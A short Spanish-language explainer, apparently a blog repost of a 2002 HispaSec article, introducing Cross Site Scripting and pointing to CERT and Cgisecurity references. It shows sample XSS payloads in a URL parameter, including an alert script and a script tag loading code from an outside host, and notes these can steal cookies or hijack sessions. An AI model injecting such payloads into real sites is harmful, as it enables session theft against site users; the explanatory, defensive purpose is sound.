Vulnerabilidad: Cross Site Scripting (XSS)

Cross Site Scripting es una vulnerabilidad muy común en muchos servidores web, sobro todo en aquellos que usan páginas dinámicas para generar el contenido. Que sea común no quiere decir que no sea importante, así que voy a explicar un poco en que consiste.

Supongamos una URL como la siguiente:

http://servidor/error.asp?msg=Error+en+los+datos

Esta URL nos muestra una página con un mensaje en el centro que reza: «Error en los datos».

El problema estriba en la posibilidad de que el usuario puede introducir cualquier mensaje en esa página, por ejemplo, «kamborio estuvo aquí». Lo que es aún peor, se podría inyectar código JavaScript en la página usando una URL como:

http://servidor/error.asp?msg=<script>// <![CDATA[ alert(‘Hola’) // ]]></script>

También existe la posibilidad de inyectar scripts mas complejos usando el atributo «src» de la etiqueta<script></script>, por ejemplo,<script src=»http://cliente/script.js»></script>. Este atributo nos permite cargar scripts largos y complejos desde otros servidores.

Gracias a este tipo de procedimientos podemos robar una cookies, secuetrar sesiones o falsificar las páginas de inicio de sesión.

El CERT ha publicado hace poco un documento sobre Cross Site Scripting Vulnerabilites, donde se describe como se pueden realizar este tipo de ataques y como podemos protegernos de ellos.

Otro documento de gran interés ha sido publicado por la gente de Cgisecurity.com: The Cross Site Scripting FAQ

La gente de eye on security ha publicado un documento titulado Bypassing JavaScript Filters – the Flash! Attack donde describen como usar los archivos Macromedia® Flash para lanzar un ataque usando Cross Site Scripting.

Más información:

EyeonSecurity

Bypassing JavaScript Filters – the Flash! Attack

Macromedia® Flash

The Cross Site Scripting FAQ

Cross Site Scripting Vulnerabilites

Vulnerabilidad: Cross Site Scripting (XSS)


Este artículo fue publicado en HispaSec el 25 de Junio de 2002 con el título Vulnerabilidad Cross Site Scripting (XSS) en archivos Macromedia Flash